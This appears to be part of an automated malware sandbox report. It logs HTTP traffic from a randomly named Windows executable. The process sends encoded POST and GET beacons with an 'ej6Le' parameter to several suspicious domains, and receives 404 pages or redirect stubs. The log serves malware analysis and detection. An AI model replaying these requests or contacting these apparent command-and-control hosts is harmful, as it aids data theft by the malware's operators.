                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              19 | 192.168.2.6 | 50012 | 161.97.168.245 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:46.057806015 CEST | 1806 | OUT | POST /epk2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Origin: http://www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.acuarelacr.buzz/epk2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le= [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:46.651693106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:46 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: W/"66cd104a-b96"
                                                                                                                              Content-Encoding: gzip


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              20 | 192.168.2.6 | 50013 | 161.97.168.245 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:34:48.603678942 CEST | 507 | OUT | GET /epk2/?ej6Le=5hSJrytQEf2r193N2AyKKNas1p8do7y+C8hF198jiQrVzRfSjh9C72xB1f8gK0fXwE+oGLvPau9gCypTG2u5T5i3An2mBAgKXA59UHv+xIL7sVXWIuP/SFcs74Xei//AEoJSK5E=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.acuarelacr.buzz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:34:49.205775023 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:49 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Content-Length: 2966
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              ETag: "66cd104a-b96"
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:49.205941916 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                              Oct 7, 2024 12:34:49.205952883 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                              Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50014 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:34:54.257118940 CEST | 760 | OUT | POST /spso/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.booosted.xyz
Origin: http://www.booosted.xyz
Connection: close
Content-Length: 210
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.booosted.xyz/spso/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le=gH2ojWB4sqgKoqlK7Ktg0LB/plxddzLt1K8NDEmsbSOCFA90xjYBNeJdwazN2e4v3+E8q0USMzXYKJxfFBeMZuktX8qyg6I+gl1elLCiTe0R55Y9cD72+Dj9p8gEhcz5EFKvvamM0GX4FHu+n1FXT6Weor82y9up+8AvgTUTJuUWPadRlMfq/LERtMauatih1AH+Ux/q4tlp


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50015 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:34:56.810563087 CEST | 784 | OUT | POST /spso/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.booosted.xyz
Origin: http://www.booosted.xyz
Connection: close
Content-Length: 234
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.booosted.xyz/spso/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le=gH2ojWB4sqgKqKVK6qRgzrB831xdUTKk1LANDFjzahqCEhN0jx8BKeJdkKzMrO403+ICq1ESM3/YKMNfQnWNY+k4OMqwtaI+gl1elLWETesR5pI9ei719Dji+MgElcz1EFLIvf+i0DT4FHe+pEFQKKWQmL9HjuHmxMd/mgs2JtU+KscL5/fJtbkTtOCcaNiL3A/+GmzN3ZAKZ+nEUgb15ThTl9pdKFuXBw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50016 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:34:59.360426903 CEST | 1797 | OUT | POST /spso/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.booosted.xyz
Origin: http://www.booosted.xyz
Connection: close
Content-Length: 1246
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.booosted.xyz/spso/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50017 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:35:02.059458017 CEST | 504 | OUT | GET /spso/?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Host: www.booosted.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 7, 2024 12:35:02.512428999 CEST | 413 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 07 Oct 2024 10:35:02 GMT
Content-Type: text/html
Content-Length: 273
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRh"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50019 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:35:07.561130047 CEST | 790 | OUT | POST /8blm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.gegeesthreadworks.info
Origin: http://www.gegeesthreadworks.info
Connection: close
Content-Length: 210
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.gegeesthreadworks.info/8blm/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le=KQDB9Sh+yavkfU/Avu9VyZGTf3zdS3aU/Zn6cHlsQ0lkG1XVhZQPWSfyrPJxWTWtjPW9GztWavp8vmnax8xGF1LCr+Hf2pC9kVXzYdc7i7bBUbI4iW/EmkgpM5P03V2XxUa7KqPXeptt5LwzPVsh6a34U0mmG0AoxoNcs6nv3D95z5vF1I9EkJnlvT8CTD7c1NRG9TcwfCJJ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50020 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:35:10.107423067 CEST | 814 | OUT | POST /8blm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.gegeesthreadworks.info
Origin: http://www.gegeesthreadworks.info
Connection: close
Content-Length: 234
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.gegeesthreadworks.info/8blm/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le=KQDB9Sh+yavkf0vA8f9VjpGQG3zdcXaI/Zj6cFI3QnBkGRfVmtMPRSfyhvJ0bzWqjPTeGzRWav98vm3axNxZD1LAzOHdr5C9kVXzYdYdi4rBUrU4wCrF4UguFZP0hl2TxUbsKvv5erFt5JozPAMiwa3+JEmwKEd2pJFYvZzckChY/vufp79n2ZHnvRkwTj723NpGvEQXQ2sqBrcQUsgJZ6LdHI3dS2nd9A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50021 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:35:12.658299923 CEST | 1827 | OUT | POST /8blm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.gegeesthreadworks.info
Origin: http://www.gegeesthreadworks.info
Connection: close
Content-Length: 1246
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://www.gegeesthreadworks.info/8blm/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le= [TRUNCATED]


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              28 | 192.168.2.6 | 50022 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:15.202512026 CEST | 514 | OUT | GET /8blm/?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.gegeesthreadworks.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:15.652370930 CEST | 413 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:15 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              29 | 192.168.2.6 | 50023 | 209.74.64.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:21.363176107 CEST | 763 | OUT | POST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=p8eB+JXL+qZoPYHonOP1Nf2QJVjCn5TRoJLIQqqou9DxYZIJnqBVxLtwHNzwRjBB9oQ3mN8TJOESRPPySxbGK84v6v+8IeDiitZT4w57QHlie9Gz0Ujaumae9SbSAX77L0eGGgTwLlLmY+Iid52v1KsYaMUhvlOPo/tXBalLYHdcUSBwCfS5CxIkt71n+tZbI29xxYdEFgKq
                                                                                                                              Oct 7, 2024 12:35:21.938657999 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:21 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              30 | 192.168.2.6 | 50024 | 209.74.64.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:23.903409004 CEST | 787 | OUT | POST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=p8eB+JXL+qZoP4boluz1aP2TMVjCypSWoJHIQr+4uoTxWbQJmopV2LtwNtzsPTBI9oVImJ4TJOQSRKLySGmQLs4pyP++MeDiitZT4wtdQH9ieNWz11jFjGaBpCbSSn7/L0fjGhfKLh7mY+Yieo2s/KsCHcUxmkvfyPlKAo1MHUVBVkAqesSaQhomt5tV+NZxK2FxjPRjKUvJdUxwTAvSkgcGm+inmWYyhQ==
                                                                                                                              Oct 7, 2024 12:35:24.476787090 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:24 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              31 | 192.168.2.6 | 50025 | 209.74.64.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:26.643429041 CEST | 1800 | OUT | POST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=[TRUNCATED]
                                                                                                                              Oct 7, 2024 12:35:27.215451956 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:27 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              32 | 192.168.2.6 | 50026 | 209.74.64.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:29.182535887 CEST | 505 | OUT | GET /dbaa/?ej6Le=k+2h99XjzdZ+a8Guk9H+DZKAegT3yZPFsem4T4eX/urocpQMmPRl+MIiB7TuMhw38cELxfo4GPEke8/YGnuBTMId45zKJfXr14lU8gtHFAMAaoG54zLZ3lT6+2fSDV7gKgn9GEE=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:29.758048058 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:29 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              33 | 192.168.2.6 | 50027 | 68.178.233.113 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:35:34.905025005 CEST | 751 | OUT | POST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=6pkncK1UsB48Di4+UBumn9QKVX4irK4IogEF9wuc+nxQJlMemHFd5+s0x+iFsi5MnjGaWxAqoP4XSOugTpcMBAdEg/Sf4JwyjKy0VaWzejag8rRZPOZSom2OSF6UlXC7sdpAl61oq5Y7rmfu0YU3x27PT8Q+A9Bjcif8D8AcgFz/n1OXlzYlrkioOId8KUxGsQDu/5OxBlXE
                                                                                                                              Oct 7, 2024 12:35:35.797230005 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:35 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
